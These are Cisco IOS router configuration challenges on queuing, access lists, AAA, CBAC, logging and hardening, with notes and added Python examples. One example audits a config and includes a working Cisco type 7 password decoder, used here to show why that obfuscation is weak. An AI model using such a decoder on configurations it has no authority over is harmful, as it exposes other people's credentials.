Define byte count and packet limits for each queue.
Apply the CQ onto an interface.

Example
> en
# config t
(config)# queue-list ?
<1-16>  Queue list number
(config)# queue-list 1 ?
default        Set custom queue for unspecified datagrams
interface      Establish priorities for packets from a named interface
lowest-custom  Set lowest number of queue to be treated as custom
protocol       priority queueing by protocol
queue          Configure parameters for a particular queue
stun           Establish priorities for stun packets
(config)# queue-list 1 protocol ?
arp            IP ARP
bridge         Bridging
bstun          Block Serial Tunnel
cdp            Cisco Discovery Protocol
compressedtcp  Compressed TCP
dlsw           Data Link Switching (Direct encapsulation only)
ip             IP
ipv6           IPV6
llc2           llc2
pad            PAD links
pppoe          PPP over Ethernet
qllc           qllc protocol
rsrb           Remote Source-Route Bridging
snapshot       Snapshot routing support
stun           Serial Tunnel
(config)# queue-list 1 protocol ip ?
<0-16>  queue number
(config)# queue-list 1 protocol ip 2 ?
fragments  Prioritize fragmented IP packets
gt         Classify packets greater than a specified size
list       To specify an access list
lt         Classify packets less than a specified size
tcp        Prioritize TCP packets 'to' or 'from' the specified port
udp        Prioritize UDP packets 'to' or 'from' the specified port
<cr>
(config)# queue-list 1 protocol ip 2 tcp ?
<0-65535>    Port number
bgp          Border Gateway Protocol (179)
chargen      Character generator (19)
cmd          Remote commands (rcmd, 514)
daytime      Daytime (13)
discard      Discard (9)
domain       Domain Name Service (53)
echo         Echo (7)
exec         Exec (rsh, 512)
finger       Finger (79)
ftp          File Transfer Protocol (21)
ftp-data     FTP data connections (20)
gopher       Gopher (70)
hostname     NIC hostname server (101)
ident        Ident Protocol (113)
irc          Internet Relay Chat (194)
klogin       Kerberos login (543)
kshell       Kerberos shell (544)
login        Login (rlogin, 513)
lpd          Printer service (515)
nntp         Network News Transport Protocol (119)
pim-auto-rp  PIM Auto-RP (496)
pop2         Post Office Protocol v2 (109)
pop3         Post Office Protocol v3 (110)
smtp         Simple Mail Transport Protocol (25)
sunrpc       Sun Remote Procedure Call (111)
syslog       Syslog (514)
tacacs       TAC Access Control System (49)
talk         Talk (517)
telnet       Telnet (23)
time         Time (37)
uucp         Unix-to-Unix Copy Program (540)
whois        Nicname (43)
www          World Wide Web (HTTP, 80)
(config)# queue-list 1 protocol ip 2 tcp 22
(config)# queue-list 1 protocol ip 2 tcp telnet
(config)# queue-list 1 protocol ip 3 tcp pop3
(config)# queue-list 1 protocol ip 3 tcp smtp
(config)# queue-list 1 protocol ip 4 tcp www
(config)# queue-list 1 default 4
(config)# queue-list 1 queue 1 ?
byte-count  Specify size in bytes of a particular queue
limit       Set queue entry limit of a particular queue
(config)# queue-list 1 queue 1 limit ?
<0-32767>  number of queue entries
(config)# queue-list 1 queue 1 limit 100
(config)# queue-list 1 queue 2 byte-count 1000
(config)# int s0
(config-if)# custom-queue-list 1

Cisco Router Challenge 178

Outline
This challenge involves configuring custom queueing using access-lists to define the traffic
for each queue.
Objectives
The objectives of this challenge are to:

Define custom queuing (CQ) for particular queues.
Define byte count and packet limits for each queue.
Apply the CQ onto an interface.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# queue-list 1 protocol ip 2 ?
fragments  Prioritize fragmented IP packets
gt         Classify packets greater than a specified size
list       To specify an access list
lt         Classify packets less than a specified size
tcp        Prioritize TCP packets 'to' or 'from' the specified port
udp        Prioritize UDP packets 'to' or 'from' the specified port
<cr>
(config)# queue-list 1 protocol ip 2 list 100
(config)# queue-list 1 protocol ip 3 list 101
(config)# queue-list 1 default 3
(config)# queue-list 1 queue 2 limit 100
(config)# queue-list 1 queue 3 byte-count 1000
(config)# int s0
(config-if)# custom-queue-list 1

Note:
Each access-list entry needs a permit or deny keyword; only packets permitted by the list are placed in the queue. Access list 100 matches the UDP port range Cisco IP phones use for RTP media (16384-32767) and H.323 call signalling on TCP 1720; access list 101 matches HTTP. Nothing prevents a host from sending ordinary traffic on those ports to get into the voice queue, so classification by port is a convenience, not a security boundary.

Cisco Router Challenge 179

Outline
This challenge involves configuring priority queueing using access-lists to define the traffic
for each queue.
Objectives
The objectives of this challenge are to:

Define priority queuing (PQ) for particular queues.
Apply the PQ onto an interface.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# priority-list ?
<1-16>  Priority list number
(config)# priority-list 1 ?
default      Set priority queue for unspecified datagrams
interface    Establish priorities for packets from a named interface
protocol     priority queueing by protocol
queue-limit  Set queue limits for priority queues
(config)# priority-list 1 protocol ?
arp            IP ARP
bridge         Bridging
cdp            Cisco Discovery Protocol
clns           ISO CLNS
clns_es        ISO CLNS End System
clns_is        ISO CLNS Intermediate System
cmns           ISO CMNS
compressedtcp  Compressed TCP (VJ)
http           HTTP
ip             IP
llc2           llc2
pad            PAD links
pppoe          PPP over Ethernet
rsrb           Remote Source-Route Bridging
snapshot       Snapshot routing support
(config)# priority-list 1 protocol ip ?
high
medium
normal
low
(config)# priority-list 1 protocol ip high ?
fragments  Prioritize fragmented IP packets
gt         Prioritize packets greater than a specified size
list       To specify an access list
lt         Prioritize packets less than a specified size
tcp        Prioritize TCP packets 'to' or 'from' the specified port
udp        Prioritize UDP packets 'to' or 'from' the specified port
<cr>
(config)# priority-list 1 protocol ip high list 100
(config)# priority-list 1 protocol ip low list 101
(config)# priority-list 1 queue-limit 20 40 60 80
(config)# int e0
(config-if)# priority-group 1

Note:
It is also possible to classify by protocol and port rather than by access list, for example:
(config)# priority-list 1 protocol ip low tcp 22
(config)# priority-list 1 protocol ip high tcp www

which gives WWW traffic a high priority and SSH a low one. Priority queuing is strict: the high queue is always emptied before the medium, normal and low queues are served, so a flood of traffic that matches the high queue starves everything behind it. That is why custom queuing, which round-robins between queues, is usually preferred on links that carry untrusted traffic. The queue-limit values (20 40 60 80) are the maximum number of packets held in the high, medium, normal and low queues respectively; packets arriving at a full queue are dropped.
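As an added example (not part of the NetworkSims page), the following Python models the two schedulers configured in Challenges 177 to 179 and runs them over a constructed packet mix, to make the starvation point concrete: a flood matching the high queue leaves priority queuing with nothing to send from the low queue, while custom queuing keeps serving it. Queue names, packet sizes, counts and the per-interval byte budget are assumptions for the illustration, not values from the page.

```python
"""Minimal models of IOS priority queuing (priority-group) and custom
queuing (custom-queue-list), driven by constructed traffic. Added example,
not code from the NetworkSims page."""
from collections import deque


def constructed_traffic():
    """Constructed arrival pattern: 50 large packets for the high queue (a
    flood that happens to match access-list 100) with one small web packet
    for the low queue after every fifth of them. Returns 50 high, 10 low."""
    pkts = []
    for i in range(50):
        pkts.append(("high", 1500))
        if i % 5 == 0:
            pkts.append(("low", 500))
    return pkts


def priority_queue_send(packets, queue_limits, budget_bytes):
    """Strict priority: the high queue is drained before medium, and so on.
    queue_limits mirrors 'priority-list 1 queue-limit 20 40 60 80' (packets
    per queue); a packet arriving at a full queue is tail-dropped.
    budget_bytes is the link capacity of one scheduling interval.
    Returns (packets sent per queue, packets dropped per queue)."""
    order = ["high", "medium", "normal", "low"]
    queues = {q: deque() for q in order}
    dropped = {q: 0 for q in order}
    for q, size in packets:
        if len(queues[q]) >= queue_limits[q]:
            dropped[q] += 1
        else:
            queues[q].append(size)
    sent = {q: 0 for q in order}
    remaining = budget_bytes
    for q in order:                      # lower queues only get what is left
        while queues[q] and queues[q][0] <= remaining:
            remaining -= queues[q].popleft()
            sent[q] += 1
    return sent, dropped


def custom_queue_send(packets, byte_counts, budget_bytes):
    """Round robin: on each turn a queue sends until it has used its
    byte-count ('queue-list 1 queue N byte-count'); the packet that crosses
    the count is still sent whole, as IOS does. Queue limits are not
    modelled here. Returns packets sent per queue."""
    order = list(byte_counts)
    queues = {q: deque() for q in order}
    for q, size in packets:
        queues[q].append(size)
    sent = {q: 0 for q in order}
    remaining = budget_bytes
    while remaining > 0 and any(queues.values()):
        progressed = False
        for q in order:
            credit = byte_counts[q]
            while queues[q] and credit > 0 and queues[q][0] <= remaining:
                size = queues[q].popleft()
                credit -= size
                remaining -= size
                sent[q] += 1
                progressed = True
        if not progressed:               # nothing fits in the remaining budget
            break
    return sent


if __name__ == "__main__":
    limits = {"high": 20, "medium": 40, "normal": 60, "low": 80}
    print("PQ:", priority_queue_send(constructed_traffic(), limits, 30000))
    print("CQ:", custom_queue_send(constructed_traffic(),
                                   {"high": 3000, "low": 1000}, 30000))
```

With a 30000-byte budget the priority scheduler spends all of it on the high queue (20 packets sent, 30 dropped at the queue limit) and sends none of the 10 low packets; the custom scheduler, with a 3000:1000 byte-count ratio, sends 16 high and all 10 low packets. The ratio of byte counts is what bounds the share any one class can take, which is the property you want when the high class can be driven by an outside sender.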

18 Security
Cisco Router Challenge 31
Outline
This challenge involves the configuration of a priority group.

Objectives
The objectives of this challenge are to:

Define an access-list.
Define a priority-group.
Define a route-cache.

Example
> en
# config t
(config)# access-list ?
<1-99>            IP standard access list
<100-199>         IP extended access list
<1000-1099>       IPX SAP access list
<1100-1199>       Extended 48-bit MAC address access list
<1200-1299>       IPX summary address access list
<1300-1999>       IP standard access list (expanded range)
<200-299>         Protocol type-code access list
<2000-2699>       IP extended access list (expanded range)
<700-799>         48-bit MAC address access list
<800-899>         IPX standard access list
<900-999>         IPX extended access list
dynamic-extended  Extend the dynamic ACL absolute timer
rate-limit        Simple rate-limit specific access list
(config)# access-list 105 ?
deny     Specify packets to reject
dynamic  Specify a DYNAMIC list of PERMITs or DENYs
permit   Specify packets to forward
remark   Access list entry comment
(config)# access-list 105 permit tcp host 144.93.24.10 host 131.33.204.2 eq domain
(config)# access-list 105 deny tcp host 154.31.216.9 host 26.100.164.1 eq domain
(config)# access-list 105 permit tcp 243.76.220.0 255.255.0.0 89.36.160.0 255.255.0.0 eq domain
(config)# access-list 105 deny tcp 102.65.178.0 255.255.0.0 5.101.146.0 255.255.0.0 eq domain
(config)# access-list 105 permit ip ?
A.B.C.D  Source address
any      Any source host
host     A single source host
(config)# access-list 105 permit ip any ?
A.B.C.D  Destination address
any      Any destination host
eq       Match only packets on a given port number
gt       Match only packets with a greater port number
host     A single destination host
lt       Match only packets with a lower port number
neq      Match only packets not on a given port number
range    Match only packets in the range of port numbers
(config)# access-list 105 permit ip any any
(config)# int e0
(config-if)# ip access-group 105 in
(config-if)# exit
(config)# priority-list 1 protocol ?
arp            IP ARP
bridge         Bridging
cdp            Cisco Discovery Protocol
compressedtcp  Compressed TCP
ip             IP
ipx            Novell IPX
llc2           llc2
pad            PAD links
snapshot       Snapshot routing support
(config)# priority-list 1 protocol ip ?
high
medium
normal
low
(config)# priority-list 1 protocol ip high ?
fragments  Prioritize fragmented IP packets
gt         Prioritize packets greater than a specified size
list       To specify an access list
lt         Prioritize packets less than a specified size
tcp        Prioritize TCP packets 'to' or 'from' the specified port
udp        Prioritize UDP packets 'to' or 'from' the specified port
<cr>
(config)# priority-list 1 protocol ip high list ?
<1-199>      IP access list
<1300-2699>  IP expanded access list
(config)# priority-list 1 protocol ip high list 105
(config)# int e0
(config-if)# priority-group ?
<1-16>  Priority group
(config-if)# priority-group 1
(config-if)# ip route-cache ?
cef             Enable Cisco Express Forwarding
flow            Enable Flow fast-switching cache
policy          Enable fast-switching policy cache for outgoing packets
same-interface  Enable fast-switching on the same interface
<cr>
(config-if)# ip route-cache
(config-if)# int e1
(config-if)# ip route-cache

Note:
The TCP port keyword for DNS is domain (port 53); there is no dns keyword. The mask that follows each network address in an extended access list is a wildcard mask, not a subnet mask: a 1 bit means "ignore this bit". So 243.76.220.0 255.255.0.0 matches any address whose last two octets are 220.0, whatever the first two octets are; to match the 243.76.0.0/16 network the entry would read 243.76.0.0 0.0.255.255. Access list 105 does double duty here: applied with ip access-group it filters traffic entering e0 (everything not matched by the tcp entries falls to permit ip any any), and referenced from priority-list it selects the packets, those matching a permit entry, that go into the high queue.

Cisco Router Challenge 33


Outline
This challenge involves the configuration of services on the router.

Objectives
The objectives of this challenge are to:

Define encrypted passwords.
Define timestamps.
Disable TCP small services.
Disable UDP small services.

Example
> en
# config t
(config)# service ?
compress-config        Compress the configuration file
config                 TFTP load config files
dhcp                   Enable DHCP server and relay agent
disable-ip-fast-frag   Disable IP particle-based fast fragmentation
exec-callback          Enable exec callback
exec-wait              Delay EXEC startup on noisy lines
finger                 Allow responses to finger requests
hide-telnet-addresses  Hide destination addresses in telnet command
linenumber             enable line number banner for each exec
nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service timestamps ?
debug  Timestamp debug messages
log    Timestamp log messages
<cr>
(config)# service timestamps log ?
datetime  Timestamp with date and time
uptime    Timestamp with system uptime
<cr>
(config)# service timestamps log datetime
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption

Note:
service finger lets anyone who can reach the router list the users logged on to it, and service dhcp is only needed when the router acts as a DHCP server or relay; on a router being hardened both are normally switched off (no service finger, no service dhcp) alongside the small servers. On IOS 12.0 and later the small servers are off by default, so the no service lines do not appear in show running-config even when they are in effect. service password-encryption applies only the reversible type 7 obfuscation to line, username and enable password strings (an enable secret is stored as a hash and is not affected), so it protects against someone reading a password over your shoulder in show running-config, not against anyone who obtains a copy of the configuration. Use enable secret rather than enable password, and guard configuration backups as carefully as the passwords themselves.
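As an added example (not part of the NetworkSims page), the following Python audits the service settings from this challenge over a constructed running-config and, to make the point about service password-encryption concrete, reverses the type 7 strings it finds. The configuration text is made up for the example; the XOR key is the fixed one IOS uses for type 7 obfuscation. The check names and the choice of which lines count as "required" or "forbidden" are this example's own.

```python
"""Audit a few IOS 'service' hardening settings and recover type 7 passwords.
Added example, not code from the NetworkSims page."""
import re

# Fixed key IOS uses for type 7 password obfuscation (public for decades).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(encoded):
    """Reverse a type 7 string: the first two decimal digits are an offset
    into TYPE7_KEY, then each pair of hex digits is one plaintext byte XORed
    with the key byte at (offset + position)."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string")
    offset = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(data)).decode("latin-1")


# Lines a hardened configuration should contain (exact text after strip) ...
REQUIRED = {
    "no service tcp-small-servers": "small TCP servers (echo, chargen, discard, daytime) not explicitly disabled",
    "no service udp-small-servers": "small UDP servers not explicitly disabled",
    "service timestamps log datetime": "log messages carry no date/time stamp",
}
# ... and lines it should not.
FORBIDDEN = {
    "service finger": "finger answers remote queries with the logged-on users",
    "service tcp-small-servers": "small TCP servers enabled",
    "service udp-small-servers": "small UDP servers enabled",
}


def audit_config(config_text):
    """Return a list of finding strings for a running-config given as text."""
    lines = [line.strip() for line in config_text.splitlines()]
    findings = []
    for needed, why in REQUIRED.items():
        if needed not in lines:
            findings.append(f"missing '{needed}': {why}")
    for bad, why in FORBIDDEN.items():
        if bad in lines:
            findings.append(f"present '{bad}': {why}")
    has_secret = any(line.startswith("enable secret ") for line in lines)
    for line in lines:
        if line.startswith("enable password ") and not has_secret:
            findings.append("enable password used without enable secret (no hashed secret)")
        m = re.match(r"(?:enable )?password 7 ([0-9A-Fa-f]+)$", line)
        if m:  # type 7 is reversible: show the operator what an attacker sees
            findings.append(f"type 7 password '{m.group(1)}' recovers to "
                            f"'{decode_type7(m.group(1))}'")
    return findings


# Constructed running-config for the example (not captured from a device).
CONSTRUCTED_CONFIG = """\
!
service timestamps log datetime
service password-encryption
service finger
no service tcp-small-servers
hostname mars
enable password 7 060506324F41
!
line vty 0 15
 password 7 0216054818
 login
"""

if __name__ == "__main__":
    for finding in audit_config(CONSTRUCTED_CONFIG):
        print(finding)
```

The two type 7 strings in the constructed config recover to "cisco" and "pass" in a few microseconds, which is the whole argument for enable secret, for username ... secret, and for treating a configuration backup as sensitive. The REQUIRED checks look for explicit no service lines, so on an image where the small servers are off by default a clean router still gets flagged until the lines are added; that is deliberate, since an explicit line survives an image upgrade that changes the default.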

Cisco Router Challenge 38

Outline
This challenge involves the configuration of AAA.

Objectives
The objectives of this challenge are to:

Define AAA details.

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authentication login default group radius
(config)# aaa authentication ppp default group radius
(config)# aaa authentication banner #new york#
(config)# aaa authentication fail-message #personal device#
(config)# aaa authorization network default group radius
(config)# aaa authorization exec default group radius

Note:
The banner and fail-message strings are entered between a pair of delimiter characters (here #). The default method lists above name RADIUS as the only method and apply to every line, the console included, so once aaa new-model is entered every login is refused if no RADIUS server answers. The server and its shared secret are defined with radius-server host <address> key <secret>; until that path has been tested, add a fallback method such as local (with a username ... secret ... account configured) after group radius, or at least keep the existing console session open. Also note that aaa authorization exec default group radius takes effect on the session you are typing in as soon as you log out.

Cisco Router Challenge 39

Outline
This challenge involves the configuration of TACACS+.

Objectives
The objectives of this challenge are to:

Setup of TACACS+.

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authentication login default group tacacs+
(config)# aaa authentication ppp default group tacacs+
(config)# aaa authentication banner #new york#
(config)# aaa authentication fail-message #personal device#
(config)# aaa authorization network default group tacacs+
(config)# aaa authorization exec default group tacacs+

Note:
The server is defined with tacacs-server host <address> key <secret>. Unlike RADIUS, which encrypts only the password attribute, TACACS+ encrypts the whole packet body with the shared key and separates authorization from authentication, which is why it is the usual choice for per-command authorization on network devices. The same lock-out caveat as for RADIUS applies: keep a fallback method (local) and an open console session until the server has been confirmed to answer.

Cisco Router Challenge 40

Outline
This challenge involves the configuration of restrictions on the local HTTP server.

Objectives
The objectives of this challenge are to:

Setup an ACL to permit a single host.
Apply the ACL to restrict access to the HTTP server to only one host.

Example
> en
# config t
(config)# access-list 7 permit host 23.17.220.3
(config)# access-list 7 deny any
(config)# ip http server
(config)# ip http ?
access-class    Restrict access by access-class
authentication  Set http authentication method
path            Set base path for HTML
port            HTTP port
server          Enable HTTP server
(config)# ip http access-class ?
<1-99>  Access list number
(config)# ip http access-class 7

Note:
The explicit deny any is redundant, since every access list ends with an implicit deny, but it documents the intent. ip http server is plain HTTP, so management credentials cross the network unencrypted; where the image supports it, ip http secure-server (HTTPS) together with no ip http server is the better choice, and the same access-class applies to it.

Cisco Router Challenge 41


Outline
This challenge involves the configuration of the HTTP server which denies a single host.

Objectives
The objectives of this challenge are to:

Setup an ACL which denies a single host.


Apply the ACL to deny the host access to the HTTP server.

Example
> en
# config t
(config)# access-list 7 deny host 23.17.220.3
(config)# access-list 7 permit any
(config)# ip http server
(config)# ip http access-class 7

Cisco Router Challenge 42

Outline
This challenge involves the configuration of permitting a single host access to the Telnet
server.

Objectives
The objectives of this challenge are to:

Setup an ACL to allow a single host access.
Apply the ACL to the Telnet server so that only a single host can get access.

Example
> en
# config t
(config)# access-list 1 permit host 202.179.77.6
(config)# access-list 1 deny any
(config)# line vty 0 15
(config-line)# login
(config-line)# access-class ?
<1-199>      IP access list
<1300-2699>  IP expanded access list
WORD         Access-list name
(config-line)# access-class 1 ?
in   Filter incoming connections
out  Filter outgoing connections
(config-line)# access-class 1 in

Note:
access-class ... in must cover every vty line the platform has (line vty 0 4 on older images, 0 15 here); any vty line left without it still accepts connections from anywhere. login on its own requires a line password to be set (password ...) or login local with a username; without one the line refuses every connection. Telnet carries the password in clear text, so on a hardened router the lines would also carry transport input ssh (after an RSA key has been generated), which removes the protocol itself from the attack surface while the access-class still applies.

Cisco Router Challenge 43

Outline
This challenge involves the configuration to deny a single host access to the Telnet server.

Objectives
The objectives of this challenge are to:

Setup an ACL to deny a single host access.
Apply the ACL to the Telnet server so that the single host is refused access and everyone else is allowed.

Example
> en
# config t
(config)# access-list 1 deny host 202.179.77.6
(config)# access-list 1 permit any
(config)# line vty 0 15
(config-line)# login
(config-line)# access-class 1 in

Note:
The order of the two entries matters: access lists are evaluated top down and the first match wins, so with permit any first the deny would never be reached. A deny list like this is a blacklist; it keeps one known address out but leaves the Telnet service exposed to every other address, so the permit-only form in the previous challenge is the one to use for management access.

Cisco Router Challenge 44

Outline
This challenge involves the configuration of IP Inspect.

Objectives
The objectives of this challenge are to:

Setup limits for the number of connections over one minute.
Setup limits for the number of open connections.
Define SYN waits.

Example
> en
# config t
(config)# ip inspect ?
alert-off       Disable alert
audit-trail     Enable the logging of session information (addresses and bytes)
dns-timeout     Specify timeout for DNS
max-incomplete  Specify maximum number of incomplete connections before clamping
name            Specify an inspection rule
one-minute      Specify one-minute-sample watermarks for clamping
tcp             Config timeout values for tcp connections
udp             Config timeout values for udp flows
<cr>
(config)# ip inspect one-minute ?
high  Specify high-watermark for clamping
low   Specify low-watermark for clamping
(config)# ip inspect one-minute low 360
(config)# ip inspect one-minute high 410
(config)# ip inspect max-incomplete low 720
(config)# ip inspect max-incomplete high 770
(config)# ip inspect dns-timeout 1
(config)# ip inspect tcp ?
finwait-time    Specify timeout for TCP connections after a FIN
idle-time       Specify idle timeout for tcp connections
max-incomplete  Specify max half-open connection per host
synwait-time    Specify timeout for TCP connections after a SYN and no further data
(config)# ip inspect tcp synwait-time ?
<1-2147483>  Timeout in seconds
(config)# ip inspect tcp synwait-time 35
(config)# ip inspect tcp finwait-time 5
(config)# ip inspect tcp max-incomplete ?
host  Specify max half-open connection per host
(config)# ip inspect tcp max-incomplete host 800
(config)# ip inspect tcp idle-time 70
(config)# ip inspect udp idle-time 57

Note:
The one-minute and max-incomplete watermarks are the CBAC defence against SYN floods. When the rate of new half-open sessions per minute (one-minute) or the total number of half-open sessions (max-incomplete) rises above the high value, the router starts deleting half-open sessions, and it keeps doing so until the figure has dropped below the low value; the low value must therefore be smaller than the high one. The per-host tcp max-incomplete limit catches a flood aimed at a single server. None of these settings does anything until an inspection rule (ip inspect name, next challenge) is applied to an interface, and a short synwait-time such as 35 seconds frees the table faster under attack at the cost of dropping legitimate slow handshakes.

Cisco Router Challenge 45

Outline
This challenge involves the configuration of Context-Based Access Control (CBAC).

Objectives
The objectives of this challenge are to:

Setup a CBAC inspection rule.
Define the protocols which the inspection rule applies to.

Example
> en
# config t
(config)# access-list 105 permit ip any any
(config)# int fa0/0
(config-if)# ip access-group 105 in
(config-if)# exit
(config)# ip inspect name cisco ?
cuseeme      CUSeeMe Protocol
fragment     IP fragment inspection
ftp          File Transfer Protocol
h323         H.323 Protocol (e.g, MS NetMeeting, Intel Video Phone)
http         HTTP Protocol
netshow      Microsoft NetShow Protocol
rcmd         R commands (r-exec, r-login, r-sh)
realaudio    Real Audio Protocol
rpc          Remote Procedure Call Protocol
rtsp         Real Time Streaming Protocol
smtp         Simple Mail Transfer Protocol
sqlnet       SQL Net Protocol
streamworks  StreamWorks Protocol
tcp          Transmission Control Protocol
tftp         TFTP Protocol
udp          User Datagram Protocol
vdolive      VDOLive Protocol
(config)# ip inspect name cisco tcp
(config)# ip inspect name cisco udp
(config)# ip inspect name cisco ftp
(config)# ip inspect name cisco sqlnet
(config)# int fa0/0
(config-if)# ip inspect ?
WORD  Name of inspection defined
(config-if)# ip inspect cisco in
(config-if)# exit
(config)# access-list 106 deny ip any any
(config)# int s0
(config-if)# ip access-group 106 in

Note:
fa0/0 is the inside (trusted) interface and s0 the outside one. Inspecting inbound traffic on fa0/0 records every session that inside hosts open; when the reply arrives on s0 the router inserts a temporary entry ahead of access list 106 for that session, so the deny ip any any on s0 blocks everything except returning traffic for sessions CBAC has seen. The protocol-specific entries (ftp, sqlnet) matter because those protocols negotiate secondary data channels that generic tcp inspection would not open. Traffic that originates outside still has no way in; to publish a server behind s0 a permit entry for it has to be added to access list 106.

Cisco Router Challenge 46

Outline
This challenge involves the configuration of a port map.

Objectives
The objectives of this challenge are to:

Define the port-mapping for various protocols.

Example
> en
# config t
(config)# ip port-map http port 1126
(config)# ip port-map ftp port 1188
(config)# ip port-map smtp port 1897
(config)# ip port-map telnet port 1189
(config)# exit
# show ip port-map
Default mapping:  vdolive      port 7000   system defined
Default mapping:  sunrpc       port 111    system defined
Default mapping:  netshow      port 1755   system defined
Default mapping:  cuseeme      port 7648   system defined
Default mapping:  tftp         port 69     system defined
Default mapping:  rtsp         port 8554   system defined
Default mapping:  realmedia    port 7070   system defined
Default mapping:  streamworks  port 1558   system defined
Default mapping:  ftp          port 21     system defined
Default mapping:  telnet       port 23     system defined
Default mapping:  rtsp         port 554    system defined
Default mapping:  h323         port 1720   system defined
Default mapping:  sip          port 5060   system defined
Default mapping:  smtp         port 25     system defined
Default mapping:  http         port 80     system defined
Default mapping:  msrpc        port 135    system defined
Default mapping:  exec         port 512    system defined
Default mapping:  login        port 513    system defined
Default mapping:  sql-net      port 1521   system defined
Default mapping:  shell        port 514    system defined
Default mapping:  mgcp         port 2427   system defined
Default mapping:  http         port 1126   user defined
Default mapping:  ftp          port 1188   user defined
Default mapping:  smtp         port 1897   user defined
Default mapping:  telnet       port 1189   user defined

Note:
Port maps tell CBAC which application-layer inspection to run on a given port, so a user-defined mapping is needed whenever a service runs on a non-standard port; without the ftp mapping for 1188, traffic to that port would be inspected as generic tcp and the FTP data channel would not be opened. A mapping applies to every host unless it is tied to a standard access list (ip port-map <application> port <port> list <acl>), which is the form to use when only particular servers listen on the unusual port.

Cisco Router Challenge 47

Outline
This challenge involves the configuration of an audit trail.

Objectives
The objectives of this challenge are to:

Setup logging.
Define an audit-trail.

Example
> en
# config t
(config)# logging on
(config)# logging 150.74.40.1
(config)# logging ?
Hostname or A.B.C.D  IP address of the logging host
buffered             Set buffered logging parameters
cns-events           Set CNS Event logging level
console              Set console logging level
count                Count every log message and timestamp last occurance
exception            Limit size of exception flush output
facility             Facility parameter for syslog messages
history              Configure syslog history table
host                 Set syslog server host name or IP address
monitor              Set terminal line (monitor) logging level
on                   Enable logging to all supported destinations
rate-limit           Set messages per second limit
source-interface     Specify interface for source address in logging transactions
trap                 Set syslog server logging level
(config)# logging host 18.46.203.4
(config)# logging trap ?
<0-7>          Logging severity level
alerts         Immediate action needed           (severity=1)
critical       Critical conditions               (severity=2)
debugging      Debugging messages                (severity=7)
emergencies    System is unusable                (severity=0)
errors         Error conditions                  (severity=3)
informational  Informational messages            (severity=6)
notifications  Normal but significant conditions (severity=5)
warnings       Warning conditions                (severity=4)
<cr>
(config)# logging trap warnings
(config)# logging monitor warnings
(config)# logging console warnings
(config)# logging buffered ?
<0-7>              Logging severity level
<4096-2147483647>  Logging buffer size
alerts             Immediate action needed           (severity=1)
critical           Critical conditions               (severity=2)
debugging          Debugging messages                (severity=7)
emergencies        System is unusable                (severity=0)
errors             Error conditions                  (severity=3)
informational      Informational messages            (severity=6)
notifications      Normal but significant conditions (severity=5)
warnings           Warning conditions                (severity=4)
<cr>
(config)# logging buffered warnings
(config)# logging buffered 981997
(config)# ip inspect audit-trail
(config)# no ip inspect alert-off

Note:
A severity setting admits that level and everything more severe (lower number). CBAC audit-trail records (%FW-6-SESS_AUDIT_TRAIL) are informational, severity 6, so with logging trap warnings (4) they are never sent to the syslog server and never kept in the buffer; set logging trap informational and logging buffered informational to capture them (the alert messages are severity 4 and do get through). logging <address> and logging host <address> are the same command, so both 150.74.40.1 and 18.46.203.4 receive messages. Syslog over UDP is neither authenticated nor encrypted and the buffer is lost on reload, so the remote collector is the copy that matters for forensics; logging source-interface pins the source address so the collector can tell routers apart.

Cisco Router Challenge 48

Outline
This challenge involves the configuration to deny an incoming SYN packet.

Objectives
The objectives of this challenge are to:

Apply an extended ACL which detects the SYN packet.

Example
> en
# config t
(config)# access-list 107 permit tcp any any ?
ack          Match on the ACK bit
dscp         Match packets with given dscp value
eq           Match only packets on a given port number
established  Match established connections
fin          Match on the FIN bit
fragments    Check non-initial fragments
gt           Match only packets with a greater port number
log          Log matches against this entry
log-input    Log matches against this entry, including input interface
lt           Match only packets with a lower port number
neq          Match only packets not on a given port number
precedence   Match packets with given precedence value
psh          Match on the PSH bit
range        Match only packets in the range of port numbers
rst          Match on the RST bit
syn          Match on the SYN bit
time-range   Specify a time-range
tos          Match packets with given TOS value
urg          Match on the URG bit
<cr>
(config)# access-list 107 permit tcp any any established
(config)# access-list 107 deny tcp any any log
(config)# int s0
(config-if)# ip access-group ?
<1-199>      IP access list (standard or extended)
<1300-2699>  IP expanded access list (standard or extended)
WORD         Access-list name
(config-if)# ip access-group 107 ?
in   inbound packets
out  outbound packets
(config-if)# ip access-group 107 in

Note:
established matches TCP segments with the ACK or RST bit set, which is every segment of a connection except the initial SYN. A new connection attempt arriving on s0 therefore fails the first entry and is dropped and logged by the second, while replies to connections opened from inside (the SYN-ACK included, since it carries ACK) are let in. Writing the rule the other way round (deny established first, then permit tcp) would do the opposite of what the outline asks, and writing it as deny tcp any any syn would also drop those SYN-ACK replies. The test is on flag bits alone: a forged segment with ACK set passes it, which is why stateful inspection (CBAC, Challenge 45) is preferred where the image supports it. Because access list 107 only mentions TCP, every other protocol arriving on s0 hits the implicit deny at the end of the list.
